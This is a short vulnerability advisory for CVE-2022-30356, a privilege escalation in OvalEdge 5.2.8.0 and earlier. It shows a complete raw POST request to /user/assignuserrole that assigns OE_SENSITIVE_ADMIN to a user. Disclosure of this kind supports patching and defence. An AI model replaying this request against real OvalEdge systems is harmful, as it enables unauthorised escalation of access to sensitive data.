# Privilege Escalation

## Privilege Escalation - OE\_ADMIN role can escalate privileges to any defined role (authenticated) <a href="#finding1" id="finding1"></a>

### CVE-2022-30356

#### OvalEdge 5.2.8.0 and earlier is affected by a Privilege Escalation vulnerability via a POST request to <mark style="color:red;">/user/assignuserrole</mark> via the <mark style="color:red;">userid</mark> and <mark style="color:red;">role</mark> parameters .  Authentication is required with OE\_ADMIN role.

{% hint style="warning" %}
**<https://example.com/ovaledge>**<mark style="color:red;">**/user/assignuserrole**</mark>
{% endhint %}

#### RAW Request

<details>

<summary>POST https://example.com/ovaledge<mark style="color:red;">/user/assignuserrole</mark> HTTP/1.1 <br>Host: example.com <br>Connection: keep-alive<br>Content-Length: 47 <br>sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" <br>Accept:*<em>/*</em><br>Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>X-Requested-With: XMLHttpRequest<br>sec-ch-ua-mobile: ?0<br>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36<br>sec-ch-ua-platform: "macOS" <br>Origin: https://example.com<br>Sec-Fetch-Site: same-origin<br>Sec-Fetch-Mode: cors<br>Sec-Fetch-Dest: empty<br>Referer: https://example.com/ovaledge/<br>Accept-Encoding: gzip, deflate, br<br>Accept-Language: en-US,en;q=0.9<br>Cookie: oe-loc=en; JSESSIONID=<mark style="color:red;">OGQ4MmFkNzYtNThjNS00MjU2LTljNGMtMGMwZjdhYjllZTk2</mark><br><br><mark style="color:red;">userid</mark>=<mark style="color:red;">admin</mark>&#x26;<mark style="color:red;">role</mark>=<mark style="color:red;">OE_SENSITIVE_ADMIN</mark>&#x26;action=ADD</summary>

</details>